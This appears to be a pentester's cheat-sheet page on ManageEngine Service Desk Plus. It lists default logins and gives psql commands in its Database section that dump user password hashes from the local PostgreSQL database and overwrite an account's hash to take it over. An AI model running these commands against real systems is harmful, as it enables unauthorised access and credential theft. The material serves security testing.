ManageEngine Service Desk Plus (SDP)

windows, enum, java, postgres

Credentials #

# default
administrator:administrator

# guest
guest:guest

Version #

Port #

Interesting URL Paths #

# Mobie form
http://examplesite.com:8080/mc

Recon #

Attacks #

Database #

/psql.exe -h 127.0.0.1 -p 65432 -U postgres -d servicedesk -c "select * from aaauser"
./psql.exe -h 127.0.0.1 -p 65432 -U postgres -d servicedesk -c "select aaauser.first_name, aaapassword.password from aaauser, aaapassword where aaauser.user_id = aaapassword.password_id "
# password: $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG
# salt: $2a$12$6VGARvoc/dRcRxOckr6Wmu
# NOTE:
# - We use backticks here to escape `$`. If not, the command
#   will fail.
./psql.exe -h 127.0.0.1 -p 65432 -U postgres -w -d servicedesk -c "update aaapassword set password='`$2a`$12`$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG', salt='`$2a`$12`$6VGARvoc/dRcRxOckr6Wmu' where password_id = 2;"

References #